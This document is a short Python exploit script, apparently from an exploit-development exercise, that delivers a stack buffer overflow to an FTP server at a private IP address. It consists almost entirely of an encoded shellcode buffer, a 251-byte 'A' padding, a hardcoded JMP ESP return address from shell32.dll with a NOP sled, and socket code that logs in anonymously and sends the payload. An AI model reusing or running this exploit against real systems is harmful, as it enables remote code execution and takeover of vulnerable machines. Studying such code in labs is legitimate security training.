import socket, os, sys


buf =  b""
buf += b"\xbd\xc6\xfa\x85\x34\xda\xd8\xd9\x74\x24\xf4\x58\x2b"
buf += b"\xc9\xb1\x53\x83\xe8\xfc\x31\x68\x0e\x03\xae\xf4\x67"
buf += b"\xc1\xd2\xe1\xea\x2a\x2a\xf2\x8a\xa3\xcf\xc3\x8a\xd0"
buf += b"\x84\x74\x3b\x92\xc8\x78\xb0\xf6\xf8\x0b\xb4\xde\x0f"
buf += b"\xbb\x73\x39\x3e\x3c\x2f\x79\x21\xbe\x32\xae\x81\xff"
buf += b"\xfc\xa3\xc0\x38\xe0\x4e\x90\x91\x6e\xfc\x04\x95\x3b"
buf += b"\x3d\xaf\xe5\xaa\x45\x4c\xbd\xcd\x64\xc3\xb5\x97\xa6"
buf += b"\xe2\x1a\xac\xee\xfc\x7f\x89\xb9\x77\x4b\x65\x38\x51"
buf += b"\x85\x86\x97\x9c\x29\x75\xe9\xd9\x8e\x66\x9c\x13\xed"
buf += b"\x1b\xa7\xe0\x8f\xc7\x22\xf2\x28\x83\x95\xde\xc9\x40"
buf += b"\x43\x95\xc6\x2d\x07\xf1\xca\xb0\xc4\x8a\xf7\x39\xeb"
buf += b"\x5c\x7e\x79\xc8\x78\xda\xd9\x71\xd9\x86\x8c\x8e\x39"
buf += b"\x69\x70\x2b\x32\x84\x65\x46\x19\xc1\x4a\x6b\xa1\x11"
buf += b"\xc5\xfc\xd2\x23\x4a\x57\x7c\x08\x03\x71\x7b\x6f\x3e"
buf += b"\xc5\x13\x8e\xc1\x36\x3a\x55\x95\x66\x54\x7c\x96\xec"
buf += b"\xa4\x81\x43\x98\xac\x24\x3c\xbf\x51\x96\xec\x7f\xf9"
buf += b"\x7f\xe7\x8f\x26\x9f\x08\x5a\x4f\x08\xf5\x65\x6a\xf0"
buf += b"\x70\x83\x1e\x12\xd5\x1b\xb6\xd0\x02\x94\x21\x2a\x61"
buf += b"\x8c\xc5\x63\x63\x0b\xea\x73\xa1\x3b\x7c\xf8\xa6\xff"
buf += b"\x9d\xff\xe2\x57\xca\x68\x78\x36\xb9\x09\x7d\x13\x29"
buf += b"\xa9\xec\xf8\xa9\xa4\x0c\x57\xfe\xe1\xe3\xae\x6a\x1c"
buf += b"\x5d\x19\x88\xdd\x3b\x62\x08\x3a\xf8\x6d\x91\xcf\x44"
buf += b"\x4a\x81\x09\x44\xd6\xf5\xc5\x13\x80\xa3\xa3\xcd\x62"
buf += b"\x1d\x7a\xa1\x2c\xc9\xfb\x89\xee\x8f\x03\xc4\x98\x6f"
buf += b"\xb5\xb1\xdc\x90\x7a\x56\xe9\xe9\x66\xc6\x16\x20\x23"
buf += b"\xf6\x5c\x68\x02\x9f\x38\xf9\x16\xc2\xba\xd4\x55\xfb"
buf += b"\x38\xdc\x25\xf8\x21\x95\x20\x44\xe6\x46\x59\xd5\x83"
buf += b"\x68\xce\xd6\x81"






buff = "A"*251 + '\x71\xe8\xf1\x77' + '\x90' * 20 + buf    #jmp esp address found by [e] click-> selecting a dll file (shell32.dll)-->ctrl+f-->jmp esp

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(('192.168.1.130', 21))

s.recv(1024)

s.send('USER anonymous\r\n')

s.recv(1024)

s.send('PASS anonymous\r\n')

s.recv(1024)

s.send(buff + '\r\n')

s.send('QUIT\r\n')

s.close()
